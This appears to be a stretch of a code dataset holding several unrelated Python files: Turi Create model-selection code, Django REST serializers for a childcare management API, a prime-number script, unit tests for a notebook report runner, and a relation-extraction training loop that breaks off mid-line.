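    # Added note (not from the upstream source): each candidate below is fitted and\n    # scored, preferring validation accuracy over training accuracy. A minimal sketch\n    # of the selection rule implemented further down, assuming `metrics` maps each\n    # model name to its accuracy:\n    #   best_model = max(metrics, key=metrics.get)\n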
    for model_name in selected_model_names:\n\n        # Fit each of the available models\n        m = create_selected(\n            model_name, dataset, target, features, validation_set, verbose\n        )\n        models[model_name] = m\n\n        if \"validation_accuracy\" in m._list_fields():\n            metrics[model_name] = m.validation_accuracy\n        elif \"training_accuracy\" in m._list_fields():\n            metrics[model_name] = m.training_accuracy\n\n        # Most models have this.\n        elif \"progress\" in m._list_fields():\n            prog = m.progress\n            validation_column = \"Validation Accuracy\"\n            accuracy_column = \"Training Accuracy\"\n            if validation_column in prog.column_names():\n                metrics[model_name] = float(prog[validation_column].tail(1)[0])\n            else:\n                metrics[model_name] = float(prog[accuracy_column].tail(1)[0])\n        else:\n            raise ValueError(\n                \"Model does not have metrics that can be used for model selection.\"\n            )\n\n    # Choose the model with the best metric (validation accuracy when available).\n    best_model = None\n    best_acc = None\n    for model_name in selected_model_names:\n        if best_acc is None:\n            best_model = model_name\n            best_acc = metrics[model_name]\n        if best_acc is not None and best_acc < metrics[model_name]:\n            best_model = model_name\n            best_acc = metrics[model_name]\n\n    ret = []\n    width = 32\n    if len(selected_model_names) > 1:\n        ret.append(\"PROGRESS: Model selection based on validation accuracy:\")\n        ret.append(\"---------------------------------------------\")\n        key_str = \"{:<{}}: {}\"\n        for model_name in selected_model_names:\n            name = python_names[model_name]\n            row = key_str.format(name, width, str(metrics[model_name]))\n            ret.append(row)\n        ret.append(\"---------------------------------------------\")\n        ret.append(\n            \"Selecting \"\n            + python_names[best_model]\n            + \" based on validation set performance.\"\n        )\n\n    if verbose:\n        print(\"\\nPROGRESS: \".join(ret))\n    return models[best_model]\n\n\ndef create_selected(\n    selected_model_name, dataset, target, features, validation_set=\"auto\", verbose=True\n):\n\n    # Create the model\n    model = create(\n        dataset,\n        target,\n        selected_model_name,\n        features=features,\n        validation_set=validation_set,\n        verbose=verbose,\n    )\n\n    return wrap_model_proxy(model.__proxy__)\n\n\ndef wrap_model_proxy(model_proxy):\n    selected_model_name = model_proxy.__class__.__name__\n\n    # Return the model\n    if selected_model_name == \"boosted_trees_regression\":\n        return _turicreate.boosted_trees_regression.BoostedTreesRegression(model_proxy)\n    elif selected_model_name == \"random_forest_regression\":\n        return _turicreate.random_forest_regression.RandomForestRegression(model_proxy)\n    elif selected_model_name == \"decision_tree_regression\":\n        return _turicreate.decision_tree_regression.DecisionTreeRegression(model_proxy)\n    elif selected_model_name == \"regression_linear_regression\":\n        return _turicreate.linear_regression.LinearRegression(model_proxy)\n    elif selected_model_name == \"boosted_trees_classifier\":\n        return _turicreate.boosted_trees_classifier.BoostedTreesClassifier(model_proxy)\n    elif selected_model_name == \"random_forest_classifier\":\n        return _turicreate.random_forest_classifier.RandomForestClassifier(model_proxy)\n    elif selected_model_name == \"decision_tree_classifier\":\n        return _turicreate.decision_tree_classifier.DecisionTreeClassifier(model_proxy)\n    elif selected_model_name == \"classifier_logistic_regression\":\n        return _turicreate.logistic_classifier.LogisticClassifier(model_proxy)\n    elif selected_model_name == \"classifier_svm\":\n        return _turicreate.svm_classifier.SVMClassifier(model_proxy)\n    else:\n        raise 
ToolkitError(\"Internal error: Incorrect model returned.\")\n\n\ndef select_default_missing_value_policy(model, action):\n from .classifier.boosted_trees_classifier import BoostedTreesClassifier\n from .classifier.random_forest_classifier import RandomForestClassifier\n from .classifier.decision_tree_classifier import DecisionTreeClassifier\n from .regression.boosted_trees_regression import BoostedTreesRegression\n from .regression.random_forest_regression import RandomForestRegression\n from .regression.decision_tree_regression import DecisionTreeRegression\n\n tree_models = [\n BoostedTreesClassifier,\n BoostedTreesRegression,\n RandomForestClassifier,\n RandomForestRegression,\n DecisionTreeClassifier,\n DecisionTreeRegression,\n ]\n\n if any(isinstance(model, tree_model) for tree_model in tree_models):\n return \"none\"\n else:\n return \"impute\"\n","repo_name":"apple/turicreate","sub_path":"src/python/turicreate/toolkits/_supervised_learning.py","file_name":"_supervised_learning.py","file_ext":"py","file_size_in_byte":18958,"program_lang":"python","lang":"en","doc_type":"code","stars":11119,"dataset":"github-code","pt":"82"} +{"seq_id":"20609561016","text":"from rest_framework import serializers\n\n# from django.contrib.auth.models import User\n\nfrom django.contrib.auth.models import Group\nfrom django.contrib.admin.models import LogEntry\nfrom .models import (\n Child,\n Locality,\n Neighborhood,\n Gender,\n Cribroom,\n Shift,\n Guardian,\n PhoneFeature,\n GuardianType,\n Payout,\n Zone,\n UserAccount,\n Desinfection,\n Department,\n\n Co_management,\n Sectional,\n IdentType,\n Phone,\n CribroomUser,\n Poll,\n Question,\n Answer,\n ChildAnswer,\n TechnicalReport\n)\n\n\nclass PhoneSerializer(serializers.ModelSerializer):\n class Meta:\n model = Phone\n fields = \"__all__\"\n extra_kwargs = {\n }\n\nclass DepthPhoneSerializer(serializers.ModelSerializer):\n class Meta:\n model = Phone\n fields = \"__all__\"\n depth = 1\n\n # history = serializers.SerializerMethodField()\n\n # def get_history(self, obj):\n # model = obj.history.__dict__['model']\n # fields = \"__all__\"\n # serializer = HistoricalRecordSerializer(model, obj.history.all().order_by('history_date'), fields=fields, many=True)\n # serializer.is_valid()\n # return serializer.data\n\n # def get_age(self, obj):\n # return obj.age()\n\nclass CribroomUserSerializer(serializers.ModelSerializer):\n class Meta:\n model = CribroomUser\n fields = \"__all__\"\n\n extra_kwargs = {\n }\n\nclass DepthCribroomUserSerializer(serializers.ModelSerializer):\n class Meta:\n model = CribroomUser\n fields = \"__all__\"\n depth = 1\n\n # history = serializers.SerializerMethodField()\n\n # def get_history(self, obj):\n # model = obj.history.__dict__['model']\n # fields = \"__all__\"\n # serializer = HistoricalRecordSerializer(model, obj.history.all().order_by('history_date'), fields=fields, many=True)\n # serializer.is_valid()\n # return serializer.data\n\n\nclass PollSerializer(serializers.ModelSerializer):\n class Meta:\n model = Poll\n fields = \"__all__\"\n\nclass QuestionSerializer(serializers.ModelSerializer):\n class Meta:\n model = Question\n fields = \"__all__\"\n\nclass QuestionDepthSerializer(serializers.ModelSerializer):\n class Meta:\n model = Question\n fields = \"__all__\"\n depth = 1\n\nclass AnswerSerializer(serializers.ModelSerializer):\n class Meta:\n model = Answer\n fields = \"__all__\"\n\nclass AnswerDepthSerializer(serializers.ModelSerializer):\n class Meta:\n model = Answer\n fields = \"__all__\"\n depth = 1\n\nclass 
ChildAnswerSerializer(serializers.ModelSerializer):\n\n valueCorrectType = serializers.SerializerMethodField()\n\n def get_valueCorrectType(self, obj):\n return obj.returnValueAsAnswerType()\n\n class Meta:\n model = ChildAnswer\n fields = \"__all__\"\n\nclass ChildAnswerDepthSerializer(serializers.ModelSerializer):\n\n valueCorrectType = serializers.SerializerMethodField()\n\n def get_valueCorrectType(self, obj):\n return obj.returnValueAsAnswerType()\n\n class Meta:\n model = ChildAnswer\n fields = \"__all__\"\n depth = 1\n\n\nclass LocalitySerializer(serializers.ModelSerializer):\n class Meta:\n model = Locality\n fields = \"__all__\"\n \n \nclass IdentTypeSerializer(serializers.ModelSerializer):\n class Meta:\n model = IdentType\n fields = \"__all__\"\n \n \nclass SectionalSerializer(serializers.ModelSerializer):\n class Meta:\n model = Sectional\n fields = \"__all__\"\n \n \nclass Co_managementSerializer(serializers.ModelSerializer):\n class Meta:\n model = Co_management\n fields = \"__all__\"\n\n\nclass DepartmentSerializer(serializers.ModelSerializer):\n class Meta:\n model = Department\n fields = \"__all__\"\n\n\nclass NeighborhoodSerializer(serializers.ModelSerializer):\n class Meta:\n model = Neighborhood\n fields = \"__all__\"\n\n\nclass GenderSerializer(serializers.ModelSerializer):\n class Meta:\n model = Gender\n fields = \"__all__\"\n\n\nclass DesinfectionSerializer(serializers.ModelSerializer):\n class Meta:\n model = Desinfection\n fields = [\"date\"]\n\n\nclass CribroomSerializer(serializers.ModelSerializer):\n class Meta:\n model = Cribroom\n fields = \"__all__\"\n\n extra_kwargs = {\n \"name\": {\"required\": False},\n \"entity\": {\"required\": False},\n \"CUIT\": {\"required\": False},\n \"code\": {\"required\": False},\n \"max_capacity\": {\"required\": False},\n \"street\": {\"required\": False},\n \"house_number\": {\"required\": False},\n \"locality\": {\"required\": False},\n \"shift\": {\"required\": False},\n \"co_management\": {\"required\": False},\n }\n\nclass DepthCribroomSerializer(serializers.ModelSerializer):\n lastDesinfection = DesinfectionSerializer(read_only=True)\n actualCapacity = serializers.SerializerMethodField()\n reachMax = serializers.SerializerMethodField()\n\n class Meta:\n model = Cribroom\n fields = \"__all__\"\n depth = 1\n\n history = serializers.SerializerMethodField()\n\n def get_history(self, obj):\n model = obj.history.__dict__['model']\n fields = \"__all__\"\n serializer = HistoricalRecordSerializer(model, obj.history.all().order_by('history_date'), fields=fields, many=True)\n serializer.is_valid()\n return serializer.data\n\n\n def get_actualCapacity(self, obj):\n return obj.actualCapacity()\n\n def get_pays(self, obj):\n return obj.totalImport()\n\n def get_reachMax(self, obj):\n return obj.reachMax()\n\n \"\"\"\n ESTO ES PARA HACER DISPLAY DEL DICCIONARIO CON EL HISTORIAL/AUDITORIA\n RETURN HISTORIAL: list[dictionary{attribute: value, attribute: value}, dictionary{attribute: value, attribute: value}]\n \n history = serializers.SerializerMethodField()\n \n\n def get_history(self, instance):\n return instance.history.values()\n \n \"\"\"\n\n\nclass ShiftSerializer(serializers.ModelSerializer):\n class Meta:\n model = Shift\n fields = \"__all__\"\n\n\nclass GuardianSerializer(serializers.ModelSerializer):\n class Meta:\n model = Guardian\n fields = \"__all__\"\n\n extra_kwargs = {\n \"first_name\": {\"required\": False},\n \"last_name\": {\"required\": False},\n \"indentification\": {\"required\": False},\n \"ident_type\": 
{\"required\": False},\n }\n\nclass DepthGuardianSerializer(serializers.ModelSerializer):\n class Meta:\n model = Guardian\n depth = 1\n fields = \"__all__\"\n\n # history = serializers.SerializerMethodField()\n\n # def get_history(self, obj):\n # model = obj.history.__dict__['model']\n # fields = \"__all__\"\n # serializer = HistoricalRecordSerializer(model, obj.history.all().order_by('history_date'), fields=fields, many=True)\n # serializer.is_valid()\n # return serializer.data\n\n\nclass PhoneFeatureSerializer(serializers.ModelSerializer):\n class Meta:\n model = PhoneFeature\n fields = \"__all__\"\n\n\nclass GuardianTypeSerializer(serializers.ModelSerializer):\n class Meta:\n model = GuardianType\n fields = \"__all__\"\n\n\nclass ChildSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Child\n fields = \"__all__\"\n \n extra_kwargs = {\n \"first_name\": {\"required\": False},\n \"last_name\": {\"required\": False},\n \"indentification\": {\"required\": False},\n \"ident_type\": {\"required\": False},\n \"birthdate\": {\"required\": False},\n \"street\": {\"required\": False},\n \"house_number\": {\"required\": False},\n \"geolocation\": {\"required\": False},\n \"registration_date\": {\"required\": False},\n \"disenroll_date\": {\"required\": False},\n \"is_active\": {\"required\": False},\n \"locality\": {\"required\": False},\n \"neighborhood\": {\"required\": False},\n \"gender\": {\"required\": False},\n \"cribroom\": {\"required\": False},\n \"shift\": {\"required\": False},\n \"guardian\": {\"required\": False},\n }\n \n\nclass DepthChildSerializer(serializers.ModelSerializer):\n age = serializers.SerializerMethodField()\n\n class Meta:\n model = Child\n fields = \"__all__\"\n depth = 1\n\n history = serializers.SerializerMethodField()\n\n def get_history(self, obj):\n model = obj.history.__dict__['model']\n fields = \"__all__\"\n serializer = HistoricalRecordSerializer(model, obj.history.all().order_by('history_date'), fields=fields, many=True)\n serializer.is_valid()\n return serializer.data\n\n def get_age(self, obj):\n return obj.age()\n\n\nclass TechnicalReportSerializer(serializers.ModelSerializer):\n pays = serializers.SerializerMethodField()\n maxCapacityStr = serializers.SerializerMethodField()\n department = serializers.SerializerMethodField()\n\n class Meta:\n model = Cribroom\n depth = 1\n fields = \"__all__\"\n\n def get_pays(self, obj):\n initial_date = self.context.get(\"initial_date\")\n end_date = self.context.get(\"end_date\")\n return obj.totalImport(initial_date, end_date)\n\n def get_maxCapacityStr(self, obj):\n return obj.maxCapacityStr()\n \n def get_department(self, obj):\n return obj.get_department()\n\n\nclass GroupSerializer(serializers.ModelSerializer):\n class Meta:\n model = Group\n fields = [\"id\", \"name\"]\n\n\nclass PayoutSerializer(serializers.ModelSerializer):\n class Meta:\n model = Payout\n fields = \"__all__\"\n\nclass ZoneSerializer(serializers.ModelSerializer):\n class Meta:\n model = Zone\n fields = \"__all__\"\n\n\nclass UserSerializer(serializers.ModelSerializer):\n history = serializers.SerializerMethodField()\n\n def get_history(self, obj):\n model = obj.history.__dict__['model']\n fields = \"__all__\"\n serializer = HistoricalRecordSerializer(model, obj.history.all().order_by('history_date'), fields=fields, many=True)\n serializer.is_valid()\n return serializer.data\n\n\n class Meta:\n model = UserAccount\n fields = \"__all__\"\n\n\n\nclass LogEntrySerializer(serializers.ModelSerializer):\n class Meta:\n model = 
LogEntry\n        depth = 1\n        fields = \"__all__\"\n\n\n\nclass TechnicalReportTableSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = TechnicalReport\n        exclude = (\"id\",)\n\nclass HistoricalRecordSerializer(serializers.ModelSerializer):\n    # Generic serializer whose model and fields are bound at instantiation time.\n    def __init__(self, model, *args, fields='__all__', **kwargs):\n        self.Meta.model = model\n        self.Meta.fields = fields\n        super().__init__(*args, **kwargs)\n\n    class Meta:\n        pass\n","repo_name":"santiago6124/SalasCuna","sub_path":"SalasCuna/SalasCuna_api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":10902,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"}
{"seq_id":"70888253068","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jan 26 20:31:31 2018\r\nFind the prime numbers up to 100\r\n@author: dk\r\n\"\"\"\r\nfor i in range(2,101):\r\n    fg = 0\r\n    for j in range(2,i-1):\r\n        if i%j == 0:\r\n            fg = 1\r\n            break\r\n    if fg == 0:\r\n        print(i, end=\" \")\r\n\r\n\r\n    \r\n    ","repo_name":"cbw6666/c-100python-","sub_path":"p26.py","file_name":"p26.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"18743139314","text":"import unittest\nimport mock\nimport analytics.cdr_ops.report_runner as runner\nfrom collections import OrderedDict\nimport copy\nfrom typing import Any, Dict\n\nfrom papermill.exceptions import PapermillExecutionError\n\n\nclass TestNotebookRunner(unittest.TestCase):\n\n    @classmethod\n    def setUpClass(cls):\n        print('**************************************************************')\n        print(cls.__name__)\n        print('**************************************************************')\n\n    def setUp(self):\n        self.notebook_py_path = 'my_notebook_path.py'\n        self.notebook_ipynb_path = 'my_notebook_path.ipynb'\n        self.notebook_html_path = 'my_notebook_path.html'\n\n    @mock.patch('jupytext.write')\n    @mock.patch('jupytext.read')\n    @mock.patch('analytics.cdr_ops.report_runner.PurePath')\n    def test_create_ipynb_from_py(self, mock_pure_path, mock_read, mock_write):\n        # Define the return object for PurePath constructor\n        pure_path_returned_value = mock.MagicMock(\n            name='returned_value_pure_path', return_value=self.notebook_py_path)\n        mock_pure_path.return_value = pure_path_returned_value\n\n        # Set up with_suffix\n        mock_with_suffix = mock_pure_path.return_value.with_suffix\n        with_suffix_returned_value = mock.MagicMock(\n            name='with_suffix', return_value=self.notebook_ipynb_path)\n        # This makes sure str(MagicMock) returns the desired value\n        with_suffix_returned_value.__str__.return_value = self.notebook_ipynb_path\n        mock_with_suffix.return_value = with_suffix_returned_value\n\n        # Set up jupytext.read value\n        jupytext_returned_value = mock.MagicMock(name='mock_read_return_value')\n        mock_read.return_value = jupytext_returned_value\n\n        # Assertions\n        actual_value = runner.create_ipynb_from_py(self.notebook_py_path)\n        self.assertEqual(self.notebook_ipynb_path, actual_value)\n\n        mock_pure_path.assert_called_once_with(self.notebook_py_path)\n        mock_read.assert_called_once_with(pure_path_returned_value)\n        mock_with_suffix.assert_called_once_with(runner.IPYNB_SUFFIX)\n        mock_write.assert_called_once_with(jupytext_returned_value,\n                                           with_suffix_returned_value)\n\n    @mock.patch('nbformat.reads')\n    @mock.patch('builtins.open',\n                new_callable=mock.mock_open,\n                read_data='fake_data')\n    @mock.patch('analytics.cdr_ops.report_runner.HTMLExporter')\n    @mock.patch('analytics.cdr_ops.report_runner.PurePath')\n    def test_create_html_from_ipynb(self, mock_pure_path, 
mock_html_exporter,\n mock_open, mock_nbformat_reads):\n # Define the return object for PurePath constructor\n pure_path_returned_value = mock.MagicMock(\n name='returned_value_pure_path',\n return_value=self.notebook_ipynb_path)\n mock_pure_path.return_value = pure_path_returned_value\n\n # Set up with_suffix\n mock_with_suffix = mock_pure_path.return_value.with_suffix\n with_suffix_returned_value = mock.MagicMock(\n name='with_suffix', return_value=self.notebook_html_path)\n # This makes sure str(MagicMock) returns the desired value\n with_suffix_returned_value.__str__.return_value = self.notebook_html_path\n mock_with_suffix.return_value = with_suffix_returned_value\n\n # Set up html_exporter\n mock_html_exporter.return_value.from_notebook_node.return_value = (\n 'return fake_data', '')\n\n runner.create_html_from_ipynb(self.notebook_ipynb_path)\n\n # Assertions in reading the notebook\n mock_open.assert_any_call(self.notebook_ipynb_path,\n 'r',\n encoding='utf-8')\n mock_nbformat_reads.assert_any_call('fake_data', as_version=4)\n mock_html_exporter.return_value.from_notebook_node.assert_any_call(\n mock_nbformat_reads.return_value)\n\n # Assertions in writing the notebook to a html page\n mock_open.assert_any_call(with_suffix_returned_value,\n 'w',\n encoding='utf-8')\n mock_open.return_value.write.assert_any_call('return fake_data')\n\n def test_infer_required(self):\n\n def create_base_dict() -> Dict[Any, Any]:\n return OrderedDict({'name': 'dataset_id', 'default': '\"\"'})\n\n base_dict = create_base_dict()\n\n # Case 1 default = '\"\"'\n actual = runner.infer_required(base_dict)\n expected = copy.deepcopy(base_dict)\n expected['required'] = True\n self.assertEqual(actual, expected)\n\n # Case 2 default = '\\'\\''\n base_dict['default'] = '\\'\\''\n actual = runner.infer_required(base_dict)\n expected = copy.deepcopy(base_dict)\n expected['required'] = True\n self.assertEqual(actual, expected)\n\n # Case 3 default = 'None'\n base_dict['default'] = 'None'\n actual = runner.infer_required(base_dict)\n expected = copy.deepcopy(base_dict)\n expected['required'] = True\n self.assertEqual(actual, expected)\n\n # Case 4 default = None\n base_dict['default'] = None\n actual = runner.infer_required(base_dict)\n expected = copy.deepcopy(base_dict)\n expected['required'] = True\n self.assertEqual(actual, expected)\n\n # Case 4 default = 'dataset_id'\n base_dict['default'] = 'dataset_id'\n actual = runner.infer_required(base_dict)\n expected = copy.deepcopy(base_dict)\n expected['required'] = False\n self.assertEqual(actual, expected)\n\n @mock.patch('analytics.cdr_ops.report_runner.is_parameter_required')\n @mock.patch('analytics.cdr_ops.report_runner.infer_notebook_params')\n def test_validate_notebook_params(self, mock_infer_notebook_params,\n mock_is_parameter_required):\n\n mock_infer_notebook_params.return_value = [\n ('dataset_id', OrderedDict({\n 'name': 'dataset_id',\n 'type': 'string'\n })),\n ('old_rdr', OrderedDict({\n 'name': 'old_rdr',\n 'type': 'string'\n })),\n ]\n\n notebook_path = 'my_notebook_path.ipynb'\n\n #Test normal case\n mock_is_parameter_required.side_effect = [True, False]\n provided_params = {'dataset_id': '23486219', 'old_rdr': '20200114'}\n result = runner.validate_notebook_params(notebook_path, provided_params)\n self.assertTrue(result)\n\n #Test expected call counts\n self.assertEqual(mock_is_parameter_required.call_count, 2)\n mock_infer_notebook_params.assert_any_call(notebook_path)\n\n #Test missing value\n mock_is_parameter_required.side_effect = [True, 
False]\n        provided_params = {'dataset_id': None, 'old_rdr': '20200114'}\n        result = runner.validate_notebook_params(notebook_path, provided_params)\n        self.assertFalse(result)\n\n        #Test missing parameter\n        mock_is_parameter_required.side_effect = [True, False]\n        provided_params = {'old_rdr': '20200114'}\n        result = runner.validate_notebook_params(notebook_path, provided_params)\n        self.assertFalse(result)\n\n        #Test unknown parameter\n        mock_is_parameter_required.side_effect = [True, False]\n        provided_params = {\n            'dataset_id': '23486219',\n            'old_rdr': '20200114',\n            'new_rdr': '20210104'\n        }\n        result = runner.validate_notebook_params(notebook_path, provided_params)\n        self.assertFalse(result)\n\n    @mock.patch('analytics.cdr_ops.report_runner.infer_notebook_params')\n    def test_display_notebook_help(self, mock_infer_notebook_params):\n        #Doesn't do much, but useful for testing if function runs\n        mock_infer_notebook_params.return_value = [\n            ('dataset_id',\n             OrderedDict({\n                 'name': 'dataset_id',\n                 'inferred_type_name': 'str',\n                 'default': '',\n                 'required': True,\n                 'help': 'help 1'\n             })),\n            ('old_rdr',\n             OrderedDict({\n                 'name': 'old_rdr',\n                 'inferred_type_name': 'str',\n                 'default': 'str',\n                 'required': True,\n                 'help': 'help 2'\n             })),\n        ]\n\n        notebook_path = 'my_notebook_path.ipynb'\n\n        runner.display_notebook_help(notebook_path)\n\n    def test_is_parameter_required(self):\n        # value of required=True should return True\n        properties = OrderedDict({\n            'name': 'dataset_id',\n            'type': 'string',\n            'required': True\n        })\n\n        result = runner.is_parameter_required(properties)\n        self.assertTrue(result)\n\n        # a missing 'required' key should default to True\n        properties = OrderedDict({'name': 'dataset_id', 'type': 'string'})\n\n        result = runner.is_parameter_required(properties)\n        self.assertTrue(result)\n\n        # value of required=False should return False\n        properties = OrderedDict({\n            'name': 'dataset_id',\n            'type': 'string',\n            'required': False\n        })\n\n        result = runner.is_parameter_required(properties)\n        self.assertFalse(result)\n\n    @mock.patch('analytics.cdr_ops.report_runner.create_html_from_ipynb')\n    @mock.patch('analytics.cdr_ops.report_runner.execute_notebook')\n    @mock.patch('analytics.cdr_ops.report_runner.display_notebook_help')\n    @mock.patch('analytics.cdr_ops.report_runner.validate_notebook_params')\n    @mock.patch('analytics.cdr_ops.report_runner.create_ipynb_from_py')\n    def test_main(self, mock_create_ipynb_from_py,\n                  mock_validate_notebook_params, mock_display_notebook_help,\n                  mock_execute_notebook, mock_create_html_from_ipynb):\n        ipynb_path = self.notebook_ipynb_path\n        mock_create_ipynb_from_py.return_value = ipynb_path\n\n        #Case where help_notebook == True\n        mock_validate_notebook_params.return_value = True\n        notebook_jupytext_path = self.notebook_py_path\n        params = {'dataset_id': '3142352351', 'old_rdr': '20201003'}\n        output_path = 'my_notebook.html'\n        help_notebook = True\n\n        with self.assertRaises(SystemExit):\n            runner.main(notebook_jupytext_path, params, output_path,\n                        help_notebook)\n\n        mock_display_notebook_help.assert_called_once_with(ipynb_path)\n\n        #Case where help_notebook == False and notebook params invalid\n        mock_display_notebook_help.reset_mock()\n\n        mock_validate_notebook_params.return_value = False\n        notebook_jupytext_path = self.notebook_py_path\n        params = {'dataset_id': '3142352351', 'old_rdr': '20201003'}\n        output_path = 'my_notebook.html'\n        help_notebook = False\n\n        with self.assertRaises(SystemExit):\n            runner.main(notebook_jupytext_path, params, output_path,\n                        help_notebook)\n\n
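        # Both the help path and the invalid-params path are expected to print help\n        # and terminate; a hedged sketch of the assumed guard inside runner.main():\n        #   if help_notebook or not validate_notebook_params(...):\n        #       display_notebook_help(ipynb_path)\n        #       sys.exit(1)\n        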
mock_display_notebook_help.assert_called_once_with(ipynb_path)\n\n # Case where help_notebook == False and notebook params valid\n mock_display_notebook_help.reset_mock()\n\n mock_validate_notebook_params.return_value = True\n notebook_jupytext_path = 'my_notebook.py'\n params = {'dataset_id': '3142352351', 'old_rdr': '20201003'}\n output_path = 'my_notebook.html'\n help_notebook = False\n\n runner.main(notebook_jupytext_path, params, output_path, help_notebook)\n mock_execute_notebook.assert_called_once()\n\n #Test that html is created even after Papermill execution error\n mock_execute_notebook.side_effect = PapermillExecutionError(\n 0, 1, 'test', 'test', 'test', '')\n\n mock_execute_notebook.reset_mock()\n mock_create_html_from_ipynb.reset_mock()\n\n runner.main(notebook_jupytext_path, params, output_path, help_notebook)\n mock_execute_notebook.assert_called_once()\n mock_create_html_from_ipynb.assert_called_once()\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"all-of-us/curation","sub_path":"tests/unit_tests/data_steward/analytics/cdr_ops/report_runner_test.py","file_name":"report_runner_test.py","file_ext":"py","file_size_in_byte":12146,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"82"} +{"seq_id":"73360527948","text":"import argparse\r\nimport os\r\n\r\nimport numpy as np\r\nimport torch\r\nimport json\r\nfrom torch.utils.data import DataLoader\r\nfrom transformers import AutoConfig, AutoModel, AutoTokenizer\r\nfrom transformers.optimization import AdamW, get_linear_schedule_with_warmup\r\nfrom transformers.optimization import get_constant_schedule_with_warmup\r\nfrom model import DocREModel\r\nfrom utils import set_seed, collate_fn\r\nfrom prepro import read_cdr, read_gda, read_docred\r\nfrom adj_utils import convert_3dsparse_to_4dsparse\r\n# import wandb\r\nfrom time import time\r\n\r\nrel2id1 = json.load(open('./meta/rel2id1.json', 'r'))\r\nid2rel = {value: key for key, value in rel2id1.items()}\r\n\r\ndef train(args, model, train_features, dev_features):\r\n def fintune(features, optimizer, num_epoch, num_steps):\r\n best_score = -1\r\n train_dataloader = DataLoader(features, batch_size=args.train_batch_size, shuffle=True,\r\n collate_fn=collate_fn, drop_last=True)\r\n train_iterator = range(int(num_epoch))\r\n total_steps = int(len(train_dataloader) * num_epoch // args.gradient_accumulation_steps)\r\n warmup_steps = int(total_steps * args.warmup_ratio)\r\n #scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps,\r\n # num_training_steps=total_steps)\r\n scheduler = get_constant_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps)\r\n\r\n print(\"Total steps: {}\".format(total_steps))\r\n print(\"Warmup steps: {}\".format(warmup_steps))\r\n for epoch in train_iterator:\r\n t1 = time()\r\n model.zero_grad()\r\n for step, batch in enumerate(train_dataloader):\r\n model.train()\r\n adjacency = convert_3dsparse_to_4dsparse(batch[5]).to(args.device)\r\n inputs = {'input_ids': batch[0].to(args.device),\r\n 'attention_mask': batch[1].to(args.device),\r\n 'labels': batch[2],\r\n 'entity_pos': batch[3],\r\n 'hts': batch[4],\r\n 'adjacency': adjacency,\r\n 'link_pos': batch[6],\r\n 'nodes_info': batch[7],\r\n }\r\n outputs = model(**inputs)\r\n loss = outputs[0] / args.gradient_accumulation_steps\r\n loss.backward()\r\n if step % args.gradient_accumulation_steps == 0:\r\n if args.max_grad_norm > 0:\r\n torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)\r\n 
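# Note added for clarity: torch.nn.utils.clip_grad_norm_ above rescales gradients\r\n                    # in place so their global L2 norm is at most max_grad_norm; e.g. a gradient\r\n                    # with total norm 5.0 and max_grad_norm 1.0 is scaled by 0.2 before the update.\r\n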
                    optimizer.step()\r\n                    scheduler.step()\r\n                    model.zero_grad()\r\n                    num_steps += 1\r\n\r\n                if (step + 1) == len(train_dataloader) - 1 or (args.evaluation_steps > 0 and num_steps % args.evaluation_steps == 0 and step % args.gradient_accumulation_steps == 0):\r\n                    dev_score, dev_output = evaluate(args, model, dev_features, tag=\"dev\")\r\n                    #test_score, test_output = evaluate(args, model, test_features, tag=\"test\")\r\n                    t2 = time()\r\n                    print(f'epoch:{epoch}, time:{humanized_time(t2-t1)}, loss:{loss}')\r\n                    print(dev_output)\r\n                    #print(test_output)\r\n                    if dev_score > best_score:\r\n                        best_score = dev_score\r\n                        if args.save_path != \"\":\r\n                            torch.save(model.state_dict(), args.save_path)\r\n                        with open('./saved_model/log.txt', 'a') as f:\r\n                            f.writelines(f'epoch:{epoch}\\n')\r\n                            f.writelines(f'{dev_output}\\n')\r\n                            #f.writelines(f'{test_output}\\n')\r\n                            f.writelines('\\n')\r\n\r\n        return num_steps\r\n\r\n    new_layer = [\"extractor\", \"bilinear\", \"Linear\", \"gcn\", \"reason\", \"fusion\"]\r\n\r\n    optimizer_grouped_parameters = [\r\n        {\"params\": [p for n, p in model.named_parameters() if not any(nd in n for nd in new_layer)], },\r\n        {\"params\": [p for n, p in model.named_parameters() if any(nd in n for nd in new_layer)], \"lr\": 1e-4},\r\n    ]\r\n\r\n    optimizer = AdamW(optimizer_grouped_parameters, lr = args.learning_rate,eps = args.adam_epsilon)\r\n    num_steps = 0\r\n    set_seed(args)\r\n    model.zero_grad()\r\n    fintune(train_features, optimizer, args.num_train_epochs, num_steps)\r\n\r\ndef evaluate(args, model, features, tag = \"dev\"):\r\n\r\n    dataloader = DataLoader(features, batch_size=args.test_batch_size, shuffle=False,\r\n                            collate_fn=collate_fn, drop_last=False)\r\n    preds, golds, dists = [], [], []\r\n    for batch in dataloader:\r\n        model.eval()\r\n        adjacency = convert_3dsparse_to_4dsparse(batch[5]).to(args.device)\r\n        inputs = {'input_ids': batch[0].to(args.device),\r\n                  'attention_mask': batch[1].to(args.device),\r\n                  'entity_pos': batch[3],\r\n                  'hts': batch[4],\r\n                  'adjacency': adjacency,\r\n                  'link_pos': batch[6],\r\n                  'nodes_info': batch[7],\r\n                  }\r\n\r\n        with torch.no_grad():\r\n            pred, *_ = model(**inputs)\r\n            pred = pred.cpu().numpy()\r\n            pred[np.isnan(pred)] = 0\r\n            preds.append(pred)\r\n            golds.append(np.concatenate([np.array(label, np.float32) for label in batch[2]], axis=0))\r\n            #dists.append(np.concatenate([np.array(dist, np.float32) for dist in batch[8]], axis=0))\r\n\r\n    preds = np.concatenate(preds, axis=0).astype(np.float32)\r\n    golds = np.concatenate(golds, axis=0).astype(np.float32)\r\n    #dists = np.concatenate(dists, axis=0).astype(np.float32)\r\n\r\n    # Compute the results:\r\n    # first build the predicted relation instances {'title': ; 'h_idx': ; 't_idx': ; 'r': } from preds and features\r\n    h_idx, t_idx, title = [], [], [] # head/tail entity indices and document titles\r\n\r\n    for 